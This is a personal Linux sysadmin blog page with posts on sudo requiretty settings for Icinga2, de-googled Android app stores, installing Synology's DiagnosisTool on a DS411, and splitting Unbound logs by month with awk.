Feuerfest

Just the private blog of a Linux sysadmin

Why I prefer !requiretty over "ssh -t"

Dall-E https://admin.brennt.net/bl-content/uploads/pages/dad5b98ab9f04a2cdca5de3afe2f6b0e/dall-e_sudo.jpg

Claudio Künzler, whom I know briefly from working with him on enhancing his check_equallogic back in 2010, wrote an article over at Geeker's Digest on How to use sudo inside SSH command. Of course he mentions the ssh -t parameter, as without it we would get the following error message when calling sudo: (Example shamelessly stolen from his article. 😇)

ck@linux:~$ ssh targetserver "sudo whoami"
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required

And ssh -t is the right call here. Well, to be fair: it's not the only solution and, in my eyes, not even the best one.

No, I am not talking about piping the password into the command prompt, which is so often recommended as a solution (it's not!) that it makes me sad.

I am talking about negating requiretty in the /etc/sudoers file or in a file under /etc/sudoers.d/ respectively.

Let's take the /etc/sudoers.d/icinga2 file I use in my article How to monitor your APT-repositories with Icinga:

Here I must use NOPASSWD for all executed commands and monitoring plugins as well as the line Defaults:icinga2 !requiretty. This negates the need for a tty for the icinga2 user completely. Omitting either the NOPASSWD or the !requiretty will give us the error message we see above.

root@admin:~ # cat /etc/sudoers.d/icinga2
# This line disables the need for a tty for sudo
#  else we will get all kind of "sudo: a password is required" errors
Defaults:icinga2 !requiretty

# sudo rights for Icinga2
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/unattended-upgrades
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/unattended-upgrade
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/apt-get
icinga2  ALL=(ALL) NOPASSWD: /usr/lib/nagios/plugins/check_apt

It's also possible to negate requiretty based only on the path to the binary, as mentioned in this StackExchange question: How to disable requiretty for a single command in sudoers?
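A per-command exception could look like the following minimal sketch - the drop-in filename and the choice of the check_apt plugin from my example are assumptions:

# Hypothetical drop-in /etc/sudoers.d/check_apt-notty:
#  disable the tty requirement only for this one binary, regardless of the calling user
Defaults!/usr/lib/nagios/plugins/check_apt !requiretty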

However keep in mind that the ordering of lines in a sudoers file is important! Quoting man sudoers from the SUDOERS FILE FORMAT section:

When multiple entries match for a user, they are applied in order. Where there are multiple matches, the last match is used (which is not necessarily the most specific match).

Why not just use ssh -t?

Personally I prefer configuring sudo-related parameters in a file under /etc/sudoers.d/. My reasons are:

When properly configured via a sudoers file it doesn't matter if a command is called via ssh, ssh -t or any other way. This enhances operational stability and makes it easier for users, as they don't have to remember adding the -t parameter.

And it at least serves as some form of documentation that this user/binary is called from another script/host/etc., giving you a clue what these sudo rights are needed/used for.
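For illustration, here is what that buys us with the drop-in from above in place - assuming we connect as the icinga2 user; the plugin output will of course differ per system:

user@host:~$ ssh icinga2@targetserver "sudo /usr/lib/nagios/plugins/check_apt"
APT OK: 0 packages available for upgrade (0 critical updates).

user@host:~$ ssh -t icinga2@targetserver "sudo /usr/lib/nagios/plugins/check_apt"
APT OK: 0 packages available for upgrade (0 critical updates).

Both calls behave the same: no tty, no password prompt.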

Comments

What the G? Exploring the current state of Google Apps & Play alternatives for Android ROMs

Photo by Kyle Roxas: https://www.pexels.com/photo/crackers-cheese-and-fruits-2122278/

I use LineageOS on my OnePlus 8T. Sadly I still run it with Android 11 and LineageOS 18.1, which is quite old in 2025. My plans to update the firmware and ROM got postponed again because, unsurprisingly: I need my phone.

However, one of the new year's resolutions I chose is to finally update my mobile so I'm not lagging behind on Android security updates for several years. *ahem*

To de-google or to not de-google?

Along with this a long-standing idea surfaced again: I want to remove as many Google services as possible without having to give up needed tools/services.

Therefore, the first question regarding updating my mobile is: Do I still want to keep using the Google Apps? Or do I want to use another suite of alternative GApps that enhance privacy at the cost of some features? Or do I want to get rid of Google's apps altogether?

Depending on that choice, I can use all, some, or none of the Google apps.

The rule of thumb is: The more functionality you need, the more you are paying with your data. The less privacy you have.

On a normal Android phone, the Google apps (YouTube, Maps, Wallet, etc.) are almost always pre-installed. Custom ROMs, in contrast, often can't pre-install these, as a) Google doesn't allow this, and b) nowadays ROM developers know that users choose an alternative ROM to gain more control over their digital life and therefore explicitly want to disable some (or all) features related to Google's services and apps.

Alternative Google apps packages: The agony of choice

For this, several Google Apps packages exist. All vary in features and what they try to accomplish.

The big three in this field are:

MindTheGapps

Currently I am running LineageOS with MindTheGapps, which is their current standard (LineageOS Wiki). MindTheGapps uses the proprietary Google services/packages. It just serves as an installer for the official Google packages. This means you can use the Google Play Store, Google Maps, every method of authentication with Google Firebase (more relevant than you might think), and the SafetyNet feature (here is a good site with a presentation, whitepaper & lectures about SafetyNet - also known as DroidGuard) on which banking apps often rely - along with all other Google services.

The downside? Google happily leeching as much data from you as they do.
But helpful if you just want a custom ROM and no hassle with non-working apps.

MicroG

A viable alternative is MicroG. MicroG is, to quote the project itself, "A free-as-in-freedom re-implementation of Google’s proprietary Android user space apps and libraries." This means MicroG is a redevelopment to match the functionality while keeping privacy-harming features out. This also means that privacy-focused ROMs like CalyxOS include them and allow users to choose if they want to activate them.

There is an overview of the implementation status of each feature in the MicroG apps: https://github.com/microg/GmsCore/wiki/Implementation-Status. And it also serves as a good example: in MicroG, two Firebase authentication methods are currently not supported. This means if an app you use relies solely on these two methods, you won't be able to sign in. It's generally advisable to check whether your important apps work with MicroG or not.

The neat thing is that MicroG uses signature spoofing to present itself as the Google apps. Additionally, the long-standing issue with allowing signature spoofing in LineageOS has been fixed recently. This means that if MicroG is installed via F-Droid and the app package is signed with the signature from the MicroG development team, LineageOS allows MicroG to spoof the signatures. Which eliminates many long-standing issues.

In practice this allows us to simply install MicroG via F-Droid and be done with it. No more incorporating the MicroG image during the flash process.

Information about their F-Droid repository can be found here: https://microg.org/fdroid.html

Please, only install MicroG from their own repository. Don't install it from the Play Store or other GitHub repositories. It's common to find malware posing as the official MicroG package. One such example is documented in this Reddit thread: https://www.reddit.com/r/MicroG/comments/1icxc8h/malware/

And here is an interview with the MicroG developer about how it all came to be: https://community.e.foundation/t/microg-what-you-need-to-know-a-conversation-with-its-developer-marvin-wissfeld/22700

OpenGApps

Honestly, I still knew this project from when I first flashed my phone, and it was the first project I looked at. But sadly it seems that development is currently very slow.

  • The last news post is from August 23, 2019.
  • Android 11 is the last supported OS version, according to their homepage.
  • The last update in their SourceForge repository happened on May 3rd, 2022, stating that support for Android 11 is, for most variants, still in the testing phase. According to their GitHub issues, some support for Android 12 should be there, but I didn't dig deeper into this.

In this GitHub issue, it's stated that they currently suffer from a lack of supporters/maintainers and have problems with their build server infrastructure, etc.

Therefore, I didn't look any deeper into this. If you want: Here is a link about what package contains which features: https://github.com/opengapps/opengapps/wiki/Advanced-Features-and-Options

Google Play store alternatives

Now that we have decided which package we want to use, we probably want to quit using the Google Play Store. After all, the more Google apps we replace, the less we are dependent on their services running on our phone.

Luckily, there are two app store alternatives that together solve all our problems.

F-Droid

F-Droid is the most commonly used alternative app store. It focuses on OpenSource software, rebuilding the .apk packages from the official repositories. Undesired features such as tracking, ads, or proprietary code are listed on each app's page. However, since they host all files themselves and focus on privacy and OpenSource, they have their own inclusion policy which apps need to fulfill in order to be added to F-Droid. Hence, many commercial apps simply can't be added, as they either directly use Google's Play services or other proprietary software to build their app, or the company simply doesn't agree to being hosted on F-Droid.

This has the direct result that many popular apps will & can never be available on F-Droid. Which leads us to...

Aurora OSS

Aurora OSS is another Google Play Store alternative - one that is usable with or without Google services or MicroG. As Aurora directly accesses the Google Play Store, you can download all apps, even the ones you paid for - as long as you log in with your Google account.

For the rest, I recommend reading their project description: https://gitlab.com/AuroraOSS/AuroraStore. The "nicer" looking URL is https://auroraoss.com/; however, this just forwards you to their GitLab project.

There is however a report that a freshly created Google account that solely used Aurora got deleted after just two hours: https://www.reddit.com/r/degoogle/comments/13td3iq/google_account_deleted_after_2_hours_of_aurora/ and https://news.ycombinator.com/item?id=36098970

But then again, this was the only big report on that matter. So I can't really tell what will happen to accounts which are also used for YouTube, or that have paid apps in the Play Store connected to them.

This discussion on Reddit provides a little bit of insight as to why this could happen to an account.

Conclusion

Aurora combined with F-Droid means we have a solution to get any and all apps we need.

And whether you plan on flashing your Android device or not: both app stores can be used on any phone, allowing you to test them out prior to making any fundamental changes to your device.

Side note: Vanishing developers

While doing my research for this article, I spent some time in the XDA Developers forum, on GitHub, GitLab instances, and even SourceForge. And I noticed a constantly recurring pattern: many of the developers simply stopped being present in the last few years. No new posts in the XDA Developers forum. No activity on GitHub, etc.

Now it's not uncommon for OpenSource projects to lose contributors or even main project developers. After all, people do have a job, a family, a life. And somehow they need to earn money. Nothing surprising about that.

But I additionally noticed that many seem to be male and of Russian nationality. Given the fact that the Russian attack on Ukraine started in February 2022 and many developers went silent in the last 2-3 years, I have a bad feeling that many of them were conscripted into the Russian army.

Let's just hope that I am wrong...

Comments

How to install DiagnosisTools on my Synology DiskStation 411, or: Why I love the Internet

Synology Inc. https://www.synology.com/img/products/detail/DS423/heading.png

I own a Synology DiskStation 411 - in short: DS411. It looks like the one in the picture - which shows the successor model DS423. The DS411 runs some custom Linux and therefore is missing a lot of common tools. Recently I had some network error which made my NAS unreachable from one of my Proxmox VMs. The debugging process was made harder as I had no tools such as lsof, strace or strings.

I googled a bit and learned that Synology offers a DiagnosisTool package which contains all these tools and more. The package center, however, showed no such package for me. From the search results I gathered that it should be shown in the package center if there is a compatible version for the DSM version running on the NAS. So it seems there is no compatible version for my DS411 running DSM 6.2.4?

Luckily there is a command to install the tools: synogear install

root@DiskStation:~# synogear install
failed to get DiagnosisTool ... can't parse actual package download link from info file

Okay, that's uncool. But that still doesn't explain why we can't install them. What does synogear install actually do? Time to investigate. As we have no stat or whereis we have to resort to command -v, which is included in the POSIX standard. (Yes, which is available, but as command is available everywhere that's the better choice.)

root@DiskStation:~# command -v synogear
/usr/syno/bin/synogear
root@DiskStation:~# head /usr/syno/bin/synogear
#!/bin/sh

DEBUG_MODE="no"
TOOL_PATH="/var/packages/DiagnosisTool/target/tool/"
TEMP_PROFILE_DIR="/var/packages/DiagnosisTool/etc/"

STATUS_NOT_INSTALLED=101
STATUS_NOT_LOADED=102
STATUS_LOADED=103
STATUS_REMOVED=104

Nice! /usr/syno/bin/synogear is a simple shellscript. Therefore we can just run it in debug mode and see what is happening without having to read every single line.

root@DiskStation:~# bash -x synogear install
+ DEBUG_MODE=no
+ TOOL_PATH=/var/packages/DiagnosisTool/target/tool/
+ TEMP_PROFILE_DIR=/var/packages/DiagnosisTool/etc/
+ STATUS_NOT_INSTALLED=101
[...]
++ curl -s -L 'https://pkgupdate.synology.com/firmware/v1/get?language=enu&timezone=Amsterdam&unique=synology_88f6282_411&major=6&minor=2&build=25556&package_update_channel=stable&package=DiagnosisTool'
+ reference_json='{"package":{}}'
++ echo '{"package":{}}'
++ jq -e -r '.["package"]["link"]'
+ download_url=null
+ echo 'failed to get DiagnosisTool ... can'\''t parse actual package download link from info file'
failed to get DiagnosisTool ... can't parse actual package download link from info file
+ return 255
+ return 255
+ status=255
+ '[' 255 '!=' 102 ']'
+ return 1
root@DiskStation:~#

The main problem seems to be an empty JSON-Response from https://pkgupdate.synology.com/firmware/v1/get?language=enu&timezone=Amsterdam&unique=synology_88f6282_411&major=6&minor=2&build=25556&package_update_channel=stable&package=DiagnosisTool and opening that URL in a browser confirms it. So there really seems to be no package for my Model and DSM version combination.

Through my search I also learned that there is a package archive at https://archive.synology.com/download/Package/DiagnosisTool/ which lists several versions of the DiagnosisTool - one package for each CPU architecture. But that also didn't give many clues, as I wasn't familiar with many of the CPU architectures and nothing seemed to match my CPU. No Feroceon or 88FR131 or the like.

root@DiskStation:~# cat /proc/cpuinfo
Processor       : Feroceon 88FR131 rev 1 (v5l)
BogoMIPS        : 1589.24
Features        : swp half thumb fastmult edsp
CPU implementer : 0x56
CPU architecture: 5TE
CPU variant     : 0x2
CPU part        : 0x131
CPU revision    : 1

Hardware        : Synology 6282 board
Revision        : 0000
Serial          : 0000000000000000

As I didn't want to randomly install all sorts of packages for different CPU architectures - not knowing how good or bad Synology is at preventing the installation of non-matching packages - I asked on the r/synology subreddit and stopped my side-quest at this point, focusing on the main problem.

Random redditors to the rescue!

Nothing much happened for 2 months and I had already forgotten about that thread. My problem with the VM was solved in the meantime and I had no reason to pursue it any further.

Then someone replied. This person apparently did try all sorts of packages for the DiskStation, additionally providing a link to the package that worked. It was there that I noticed something. The link provided was: https://global.synologydownload.com/download/Package/spk/DiagnosisTool/1.1-0112/DiagnosisTool-88f628x-1.1-0112.spk and I recognized the string 88f628x but couldn't pin down where I had spotted it before. Then it dawned on me: 88f for the Feroceon 88FR131 and 628x for all Synology 628x boards. Could this really be it?

Armed with this information I quickly identified https://global.synologydownload.com/download/Package/spk/DiagnosisTool/3.0.1-3008/DiagnosisTool-88f628x-3.0.1-3008.spk to be the last version for my DS411 and installed it via the package center GUI (button "Manual installation" and then navigated to the downloaded .spk file on my computer).

Note: The .spk file seems to be a normal compressed tar file and can be opened with the usual tools. The file structure inside is roughly the same as with any RPM or DEB package, making it easy to understand what happens during/after package installation.
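If you want to take a look yourself, a quick sketch - tar should detect the compression on its own; the filename is the one from above:

user@host:~$ tar -tvf DiagnosisTool-88f628x-3.0.1-3008.spk                        # list the contents
user@host:~$ mkdir spk && tar -xf DiagnosisTool-88f628x-3.0.1-3008.spk -C spk/    # unpack for inspection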

The installation went fine, no errors reported and after that synogear install worked:

root@DiskStation:~# synogear install
Tools are installed and ready to use.
DiagnosisTool version: 3.0.1-3008

And I was finally able to use lsof!

root@DiskStation:~# lsof -v
lsof version information:
    revision: 4.89
    latest revision: ftp://lsof.itap.purdue.edu/pub/tools/unix/lsof/
    latest FAQ: ftp://lsof.itap.purdue.edu/pub/tools/unix/lsof/FAQ
    latest man page: ftp://lsof.itap.purdue.edu/pub/tools/unix/lsof/lsof_man
    constructed: Mon Jan 20 18:58:20 CST 2020
    compiler: /usr/local/arm-marvell-linux-gnueabi/bin/arm-marvell-linux-gnueabi-ccache-gcc
    compiler version: 4.6.4
    compiler flags: -DSYNOPLAT_F_ARMV5 -O2 -mcpu=marvell-f -include /usr/syno/include/platformconfig.h -DSYNO_ENVIRONMENT -DBUILD_ARCH=32 -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=64 -g -DSDK_VER_MIN_REQUIRED=600 -pipe -fstack-protector --param=ssp-buffer-size=4 -Wformat -Wformat-security -D_FORTIFY_SOURCE=2 -O2 -Wno-unused-result -DNETLINK_SOCK_DIAG=4 -DLINUXV=26032 -DGLIBCV=215 -DHASIPv6 -DNEEDS_NETINET_TCPH -D_FILE_OFFSET_BITS=64 -D_LARGEFILE64_SOURCE -DLSOF_ARCH="arm" -DLSOF_VSTR="2.6.32" -I/usr/local/arm-marvell-linux-gnueabi/arm-marvell-linux-gnueabi/libc/usr/include -I/usr/local/arm-marvell-linux-gnueabi/arm-marvell-linux-gnueabi/libc/usr/include -O
    loader flags: -L./lib -llsof
    Anyone can list all files.
    /dev warnings are disabled.
    Kernel ID check is disabled.

The redditor was also so kind as to let me know that I have to execute synogear install each time before I can use these tools. Huh? Why is that? Shouldn't they be in my path?

Turns out: no, the directory /var/packages/DiagnosisTool/target/tool/ isn't included in our PATH environment variable.

root@DiskStation:~# echo $PATH
/sbin:/bin:/usr/sbin:/usr/bin:/usr/syno/sbin:/usr/syno/bin:/usr/local/sbin:/usr/local/bin

synogear install does that. It copies /etc/profile to /var/packages/DiagnosisTool/etc/.profile while removing all lines starting with PATH or export PATH, adds the tools directory to the new PATH, exports it and sets the new .profile file in the ENV environment variable.

Most likely this is just a precaution for novice users.

And to check if the tools are "loaded", the script simply greps whether /var/packages/DiagnosisTool/target/tool/ is included in $PATH.

So yeah, there is no technical reason preventing us from just adding /var/packages/DiagnosisTool/target/tool/ to $PATH and being done with it.
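If you want that permanently, a minimal sketch - assuming you are fine with extending root's ~/.profile on the DiskStation instead of relying on synogear install:

root@DiskStation:~# echo 'export PATH="$PATH:/var/packages/DiagnosisTool/target/tool/"' >> ~/.profile
root@DiskStation:~# . ~/.profile
root@DiskStation:~# command -v lsof
/var/packages/DiagnosisTool/target/tool/lsof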

And this is why I love the internet. I would never have figured that out if someone hadn't posted a reply and included the file which worked.

New learnings

Synology mailed me about critical security vulnerabilities present in DSM 6.2.4-25556 Update 7 which are fixed in 6.2.4-25556 Update 8 (read the Release Notes). However, the update wasn't offered to me via the normal update dialog in the DSM, as it is a staged rollout. Therefore I opted to download a patch file from the Synology support site. This means I did not download the whole DSM package for a specific version but just the patch from one version to another. And here I noticed that the architecture name is included in the patch filename. Nice.

If you visit https://www.synology.com/en-global/support/download/DS411?version=6.2 do not just click on Download; instead choose your current DSM version and the target version you wish to update to. Then you are offered a patch file, and the identifier/name of the architecture your DiskStation uses is part of the filename.

This should be a reliable way to identify the architecture for all Synology models - in case it isn't clear through the CPU/board name, etc. as in my case.

List of included tools

Someone asked me for a list of all tools included in the DiagnosisTool package. Here you go:

admin@DiskStation:~$ ls -l /var/packages/DiagnosisTool/target/tool/ | awk '{print $9}'
addr2line
addr2name
ar
arping
as
autojump
capsh
c++filt
cifsiostat
clockdiff
dig
domain_test.sh
elfedit
eu-addr2line
eu-ar
eu-elfcmp
eu-elfcompress
eu-elflint
eu-findtextrel
eu-make-debug-archive
eu-nm
eu-objdump
eu-ranlib
eu-readelf
eu-size
eu-stack
eu-strings
eu-strip
eu-unstrip
file
fio
fix_idmap.sh
free
gcore
gdb
gdbserver
getcap
getpcaps
gprof
iftop
iostat
iotop
iperf
iperf3
kill
killall
ld
ld.bfd
ldd
log-analyzer.sh
lsof
ltrace
mpstat
name2addr
ncat
ndisc6
nethogs
nm
nmap
nping
nslookup
objcopy
objdump
perf-check.py
pgrep
pidof
pidstat
ping
ping6
pkill
pmap
ps
pstree
pwdx
ranlib
rarpd
rdisc
rdisc6
readelf
rltraceroute6
run
sa1
sa2
sadc
sadf
sar
setcap
sid2ugid.sh
size
slabtop
sockstat
speedtest-cli.py
strace
strings
strip
sysctl
sysstat
tcpdump_wrapper
tcpspray
tcpspray6
tcptraceroute6
telnet
tload
tmux
top
tracepath
traceroute6
tracert6
uptime
vmstat
w
watch
zblacklist
zmap
ztee
Comments

Howto properly split all logfile content based on timestamps - and realizing my own fallacy

Photo by Mikhail Nilov: https://www.pexels.com/photo/person-in-black-hoodie-using-a-computer-6963061/

I use a Pi-hole for DNS-based AdBlocking in my home network. Additionally I installed Unbound as a recursive DNS resolver on it. Meaning: I can use the RaspberryPi in my home network as the DNS server for all my devices. This way I don't have to use the DNS servers of my ISP, granting me some additional privacy. Additionally I can see which DNS queries are sent by each device - leading to surprising revelations.

However, recently my internet connection was interrupted and afterwards I noticed that I couldn't access any site or service where I used a domain or hostname to connect. And while the problem itself (dnsmasq: Maximum number of concurrent DNS queries reached (max: 150)) was easily fixed with a simple restart of the unbound service, I noticed that the /var/log/unbound/unbound.log logfile was uncompressed, unrotated and 3.3 gigabytes in size. Whoops. That happens when no logrotate job is present.

Side gig: A logrotate config for Unbound

Fixing this issue was rather easy. A short search additionally revealed that unbound-control has a log_reopen option which is a good idea to trigger after the logrotate. This way Unbound properly closes old filehandles and uses the new logfile.

root@pihole:~# cat /etc/logrotate.d/unbound
/var/log/unbound/unbound.log {
        monthly
        missingok
        rotate 12
        compress
        delaycompress
        notifempty
        sharedscripts
        create 644
        postrotate
                /usr/sbin/unbound-control log_reopen
        endscript
}
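
To check the new configuration without waiting a month, logrotate can be run in debug mode (a dry run) or forced once:

root@pihole:~# logrotate --debug /etc/logrotate.d/unbound    # only prints what would be done
root@pihole:~# logrotate --force /etc/logrotate.d/unbound    # actually rotates the file once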

But wait, there is more

However I had it on my list to dig deeper into the dnsmasq: Maximum number of concurrent DNS queries reached (max: 150) error in order to better understand the whole construct of Pi-hole, dnsmasq and Unbound.

However, the logfile was way too big to work with conveniently. 49,184,687 lines are just too much, especially on a RaspberryPi with its comparatively limited CPU power. Now I could have just split it up after n lines using split -l number-of-lines, but that is:

  • Too easy and
  • I have encountered the need for a script which splits logfile lines based on a range of timestamps more often recently anyway

How to properly split a logfile - and overcomplicating stuff

Most of the unbound logfile lines will have the Unix timestamp in brackets, followed by the process name, the log level the message belongs to and the actual message.

root@pihole:~# head -n 1 /var/log/unbound/unbound.log
[1700653509] unbound[499:0] debug: module config: "subnetcache validator iterator"

However, some multi-line messages won't follow this format:

[1700798246] unbound[1506:0] info: incoming scrubbed packet: ;; ->>HEADER<<- opcode: QUERY, rcode: NOERROR, id: 0
;; flags: qr aa ; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
chat.cdn.whatsapp.net.  IN      A

;; ANSWER SECTION:
chat.cdn.whatsapp.net.  60      IN      A       157.240.252.61

;; AUTHORITY SECTION:

;; ADDITIONAL SECTION:
;; MSG SIZE  rcvd: 55

[1700798246] unbound[1506:0] debug: iter_handle processing q with state QUERY RESPONSE STATE

This means we need the following technical approach:

  1. Generate the Unix-timestamp for the first day in a month at 00:00:00 o'clock
    • Alternatively formulated: The Unix-timestamp for the first second of a month
  2. Generate the Unix-timestamp for the last day of the month at 23:59:59 o'clock
    • The last second of a month
  3. Find the first occurrence of the timestamp from point 1
  4. Find the last occurrence of the timestamp from point 2
  5. Use sed to move the lines for each month into a separate logfile

I will, however, also show an awk command for filtering based on the timestamps, useful for logfiles where every line is prefixed with a timestamp.

Calculating with date

Luckily date is powerful and easy to use for date calculations. %s gives us the Unix timestamp. We do not need to specify hours:minutes:seconds as date automatically takes 00:00:00 for these values, giving us the first second of a day. And date also takes care of leap years and possibly a lot of other nuisances when it comes to time and date calculations.

To get the last second of a month we simply take the first day of the month, add a month and subtract one second. It couldn't be easier.

# Unix timestamp for the first second in a month
user@host:~$ date -d "$(date +%Y/%m/01)" "+%Y/%m/%d %X - %s"
2024/11/01 00:00:00 - 1730415600

# Unix timestamp for the last second in a month
user@host:~$ date -d "$(date +%Y/%m/01) + 1 month - 1 second" "+%Y/%m/%d %X - %s"
2024/11/30 23:59:59 - 1733007599

To verify the values we can use this for-loop. It will give us all the dates and timestamps we need to confirm that our commands are correct.

user@host:~$ for YEAR in {2023..2024}; do for MONTH in {1..12}; do echo -n "$(date -d "$(date +$YEAR/$MONTH/01)" "+%Y/%m/%d %X - %s")  "; date -d "$(date +$YEAR/$MONTH/01) + 1 month - 1 second" "+%Y/%m/%d %X - %s"; done; done
2023/01/01 00:00:00 - 1672527600  2023/01/31 23:59:59 - 1675205999
2023/02/01 00:00:00 - 1675206000  2023/02/28 23:59:59 - 1677625199
2023/03/01 00:00:00 - 1677625200  2023/03/31 23:59:59 - 1680299999
2023/04/01 00:00:00 - 1680300000  2023/04/30 23:59:59 - 1682891999
2023/05/01 00:00:00 - 1682892000  2023/05/31 23:59:59 - 1685570399
2023/06/01 00:00:00 - 1685570400  2023/06/30 23:59:59 - 1688162399
2023/07/01 00:00:00 - 1688162400  2023/07/31 23:59:59 - 1690840799
2023/08/01 00:00:00 - 1690840800  2023/08/31 23:59:59 - 1693519199
2023/09/01 00:00:00 - 1693519200  2023/09/30 23:59:59 - 1696111199
2023/10/01 00:00:00 - 1696111200  2023/10/31 23:59:59 - 1698793199
2023/11/01 00:00:00 - 1698793200  2023/11/30 23:59:59 - 1701385199
2023/12/01 00:00:00 - 1701385200  2023/12/31 23:59:59 - 1704063599
2024/01/01 00:00:00 - 1704063600  2024/01/31 23:59:59 - 1706741999
2024/02/01 00:00:00 - 1706742000  2024/02/29 23:59:59 - 1709247599
2024/03/01 00:00:00 - 1709247600  2024/03/31 23:59:59 - 1711922399
2024/04/01 00:00:00 - 1711922400  2024/04/30 23:59:59 - 1714514399
2024/05/01 00:00:00 - 1714514400  2024/05/31 23:59:59 - 1717192799
2024/06/01 00:00:00 - 1717192800  2024/06/30 23:59:59 - 1719784799
2024/07/01 00:00:00 - 1719784800  2024/07/31 23:59:59 - 1722463199
2024/08/01 00:00:00 - 1722463200  2024/08/31 23:59:59 - 1725141599
2024/09/01 00:00:00 - 1725141600  2024/09/30 23:59:59 - 1727733599
2024/10/01 00:00:00 - 1727733600  2024/10/31 23:59:59 - 1730415599
2024/11/01 00:00:00 - 1730415600  2024/11/30 23:59:59 - 1733007599
2024/12/01 00:00:00 - 1733007600  2024/12/31 23:59:59 - 1735685999

To verify we can do the reverse (Unix timestamp to date) with the following command:

user@host:~$ date -d @1698793200
Wed  1 Nov 00:00:00 CET 2023

Solution solely working on timestamps

As the logfile timestamp is enclosed in brackets we need to tell awk to treat either [ or ] as a field separator. Then we can use awk to check if the second field is in a given time frame. For the first test run we define the variables manually in our shell and adjust the date commands to only output the Unix timestamp.

And as the logfile starts in November 2023 I set the values accordingly. awk then conveniently puts all lines whose timestamp is between these two values into a separate logfile.

user@host:~$ YEAR=2023
user@host:~$ MONTH=11
user@host:~$ FIRST_SECOND=$(date -d "$(date +$YEAR/$MONTH/01)" "+%s")
user@host:~$ LAST_SECOND=$(date -d "$(date +$YEAR/$MONTH/01) + 1 month - 1 second" "+%s")
user@host:~$ awk -F'[\\[\\]]' -v MIN=${FIRST_SECOND} -v MAX=${LAST_SECOND} '{if($2 >= MIN && $2 <= MAX) print}' /var/log/unbound/unbound.log >> /var/log/unbound/unbound-$YEAR-$MONTH.log

And this would already work fine if every line started with the timestamp. As this is not the case we need to add a bit more logic.

So the resulting script would look like this:

user@host:~$ cat date-split.sh
#!/bin/bash
# vim: set tabstop=2 smarttab shiftwidth=2 softtabstop=2 expandtab foldmethod=syntax :

# Split a logfile based on timestamps

LOGFILE="/var/log/unbound/unbound.log"
AWK="$(command -v awk)"
GZIP="$(command -v gzip)"

for YEAR in {2023..2024}; do
  for MONTH in {1..12}; do

    # Logfile starts November 2023 and ends November 2024 - don't grep for values before/after that time window
    if  [[ "$YEAR" -eq 2023 && "$MONTH" -gt 10 ]] ||  [[ "$YEAR" -eq 2024 && "$MONTH" -lt 12 ]]; then

      # Debug
      echo "$YEAR/$MONTH"

      # Calculate first and last second of each month
      FIRST_SECOND="$(date -d "$(date +"$YEAR"/"$MONTH"/01)" "+%s")"
      LAST_SECOND="$(date -d "$(date +"$YEAR"/"$MONTH"/01) + 1 month - 1 second" "+%s")"

      # Export variables so the grep in the sub-shells have this value
      export FIRST_SECOND
      export LAST_SECOND

      # Split logfiles solely based on timestamps
      awk -F'[\\[\\]]' -v MIN=${FIRST_SECOND} -v MAX=${LAST_SECOND} '{if($2 >= MIN && $2 <= MAX) print}' unbound.log >> "unbound-$YEAR-$MONTH.log"

      # Creating all those separate logfiles will probably fill up our diskspace
      #  therefore we gzip them immediately afterwards
      "$GZIP" "/var/log/unbound/unbound-$YEAR-$MONTH.log"

    fi

  done;
done

However, this script is vastly over-engineered. Why? Read on.

StackOverflow to the rescue

I still had the problem with the multi-line log messages. At first I wanted to use grep to get the matching first and last line numbers with head and tail. But uh... yeah, I had a fallacy here, as this still wouldn't have worked with multi-line log messages lacking a timestamp. Also, using grep like this is highly inefficient. While that would be fine for a one-time script, I still hit a road block.

I just wasn't able to get awk to do what I wanted, so I resorted to asking my question on StackOverflow. Better to get input from others than to waste a lot of time.

awk to the rescue

It was only through the answer that I realized that my solution was a bit over-engineered. Why use date if you can use strftime to calculate the year and month from the timestamp directly? The initial answer was:

awk '
$1 ~ /^\[[0-9]+]$/ {
  f = "unbound-" strftime("%m-%Y", substr($1, 2, length($1)-2)) ".log"
  if (f != prev) close(f); prev = f
}
{
  print > f
}' unbound.log

How this works has been explained in detail on StackOverflow, so I just copy & paste it here.

For each line which first field is a [timestamp] (that is, matches regexp ^\[[0-9]+]$), we use substr and length to extract timestamp, strftime to convert it to a mm-YYYY string and assign "unbound-mm-YYYY.log" to variable f. In the second block, that applies to all lines, we print the current line in file f. Note: contrary to shell redirections, in awk, print > FILE appends to FILE.

Edit: as suggested by Ed Morton closing each file when we are done with it should significantly improve the performance if the total number of files is large. if (f != prev) close(f); prev = f added. Ed also noted that escaping the final ] in the regex is useless (and undefined behavior per POSIX). Backslash removed.

And this worked flawlessly. The generated monthly logfiles from my testfile matched exactly the line-numbers per month. Even multi-line log messages and empty lines were included.

All I then did was add gzip to compress each file right before the next file is created, just to prevent filling up the disk completely. Additionally I changed the filename from unbound-MM-YYYY.log to unbound-YYYY-MM.log. Yes, the logfile name won't work with logrotate. But I just need it to properly dig through the files, and the year-month naming will be of great help here. Afterwards I don't need them anymore and will delete them. So this was none of my concern.

This was my new working solution:

awk '$1 ~ /^\[[0-9]+]$/ {
  f = "unbound-" strftime("%Y-%m", substr($1, 2, length($1)-2)) ".log"
  if (f != prev) {
    # close the previous logfile first so all buffered lines are flushed
    #  and the file descriptor is released, then compress it
    if (prev) {
      close(prev)
      system("gzip " prev)
    }
    prev = f
  }
}
{
  print > f
}
END {
  if (prev) {
    close(prev)
    system("gzip " prev)
  }
}' unbound.log

No bash script with convoluted logic needed. And it's easily usable for other logfiles too. Just adapt the starting regular expression to match the one the logfile uses and adapt the logic for strftime so the proper timestamp can be created.
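For example, for a hypothetical logfile whose lines start with an ISO date such as 2024-11-30 23:59:59, the same idea works even without strftime, as year and month can be taken directly from the first field - a minimal sketch (filenames are made up, and the first line is assumed to start with a date, just like in the unbound case):

awk '$1 ~ /^[0-9]{4}-[0-9]{2}-[0-9]{2}$/ {
  # build the output name from year and month of the first field, e.g. app-2024-11.log
  f = "app-" substr($1, 1, 7) ".log"
}
{
  # lines without a leading date (multi-line messages) still go to the current file
  print > f
}' app.log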

Sometimes it's better to ask other people. 😄

Comments

Why basics matter

Photo by George Becker: https://www.pexels.com/photo/1-1-3-text-on-black-chalkboard-374918/

Someone on the Internet asked on Reddit what this CronJob does, as it looked strange.

